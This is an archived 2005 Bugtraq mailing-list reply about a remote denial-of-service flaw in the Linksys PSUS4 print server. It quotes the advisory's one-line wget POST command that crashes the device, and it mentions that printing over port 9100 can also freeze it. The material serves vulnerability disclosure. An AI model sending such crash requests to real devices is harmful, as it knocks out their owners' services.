Re: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
From: Denis Jedig <seclists@xxxxxxxxxxxx>
Date: Fri, 04 Feb 2005 02:20:40 +0100
Cc: laurent oudot <oudot@xxxxxxxxxx>
In-reply-to: <20050203224916.32663.qmail@xxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20050203224916.32663.qmail@xxxxxxxxxxxxxxxxxxxxx>
User-agent: Mozilla Thunderbird 1.0 (Windows/20041206)

laurent oudot wrote:

Background
==========

PSUS4 is one of the small embedded Linksys wired print servers.

Affected products
=================

Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)

Description
===========

Here is an example, to crash a remote PSUS4 :

$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
[...]
=> And the PSUS4 is crashed.

Well, if you want a more complicated way, just try to print a pagethrough the SMP (tcp/9100) - it will occasionally freeze the printserver as well.

The firmware seems not to be very mature, I'd bet that we could expectmore serious vulnerabilities from it.


Denis

References:
- [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
  - From: laurent oudot

Prev by Date: [SECURITY] [DSA 667-1] New PostgreSQL packages fix arbitrary library loading
Next by Date: Re: Squirrelmail vacation v0.15 local root exploit
Previous by thread: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
Next by thread: [SECURITY] [DSA 666-1] New Python2.2 packages fix unauthorised XML-RPC internals access
Index(es):
- Date
- Thread